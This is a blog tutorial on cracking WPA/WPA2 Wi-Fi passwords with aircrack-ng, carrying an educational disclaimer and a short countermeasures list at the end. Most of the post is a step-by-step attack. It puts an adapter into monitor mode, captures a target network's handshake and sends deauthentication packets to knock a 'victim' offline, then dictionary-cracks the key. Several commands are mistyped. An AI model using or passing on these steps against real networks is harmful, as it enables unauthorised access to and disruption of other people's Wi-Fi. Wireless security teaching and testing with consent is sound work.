Hey Guys, Back again with another blog.
This blog is not only for Cyber Security Professionals, but also for those who really want to try it for fun. 🙂
Disclaimer : This blog is Exclusively for Educational Purposes, We are not Responsible for any Malicious Activity.
Do not try with Malicious intent, Stick with Ethics.
Many of us would have thought how to hack Wi-Fi at-least once in our life. Come Let’s do it.
Here we have Abishek with us to demonstrate how to Hack Wi-FI?
Let’s Have a Look at How Wi-Fi is working in 4-way Hand Shake between the router and the User.

I hope you can clearly understand whats happening above. What we are going to do here is very simple.
We all use connect automatically feature when we connect with any Wi-Fi isn’t it? We are going to take advantage of that feature.
We will disconnect an already authenticated person from Wi-fi, when his device tries to reconnect with the Wi-Fi we can steal the handshake key to crack the password.
Cracking a WPA/WPA2 wireless Networking Using Aircrack-ng
From the hacker perspective, we can use brute force or dictionary attack and rainbow table to crack  WPA/WPA2 network. The best attack is dictionary attack to take less time but the success rate of the attack depend on the word-list you use to crack the password. This attack totally relies on four way handshake of Wi-Fi.
Requirements
- PC with Kali Linux or Parrot or Ubuntu Operating System.
- A Wi-Fi card adapter which support monitoring mode. (I suggest you to buy Leoxsys Adapater) Click to buy
- Updated Aircrack-ng Suite.
Let’s Hack
Step 1: Run Terminal as root by su command
Step 2: type iwconfig in terminal with the wifi card adapter plugged in.

Step 3: Note your wi-fi adapter name in my case (wlx502b73e5cd3b)
Step 4: change in to monitoring mode.
# airmon-ng start wlx502b73e5cd3b

Step 5: Again type # iwconfig.

Step 6 : airodump -ng wlan0mon
           To Check wireless access point around you and note down your target router’s Mac Address(BSSID).
           In this scenario my Target wifi name is WIFI hack
           Use (ctrl+c) to stop scanning.

Step 7 : capture the handshake file and save the handshake into a file
           airodump-ng – – bssid (bssid number ) -c (ch number) -w (path to save the handshake file) wlan0mon (wifi interface name).

Step 8 : Send DE authentication packets to the any one of the Victim connected with your target Wi-Fi (Do this in new terminal Do Not Interrupt the Handshake)
          #aireplay-ng –deauth 0 -a (bssid) -wlan0mon.

Step 9: Wait for WPA handshake when one of the victim tries to reconnect with the target router.

.Step 10 : Then we can use the Captured Handshake WPA file using aircrack
             # aircrack-ng -w (path of word list ) (path of wpa .cap)

Here key of our target Wi-Fi is found as 12345678. I have set it up an Easy key for Demonstration. Complex Passwords needs lot of time and Dedicated Dictionary files to crack.
Medium level, complicated passwords can be cracked with different Dictionary files. You can get lots of Dictionary files from the internet.
We have many tools like aircrack-ng is available in the market like Fluxion etc. Stick to the tool which is reliable to the individual.
Countermeasures:
Disable WPS key
Change of Passwords in regular interval of time
Always use Complex passwords, with password policies.
Use lengthier Passwords.
Change of SSID also helpful
Do not Use Default Credentials for Wi-Fi Login Page.
Try this at home with concern.
Stick with us, Learn Together.
Bye Bye… See you in another blog.
Author
Abishek prakash
Cyber Security Intern.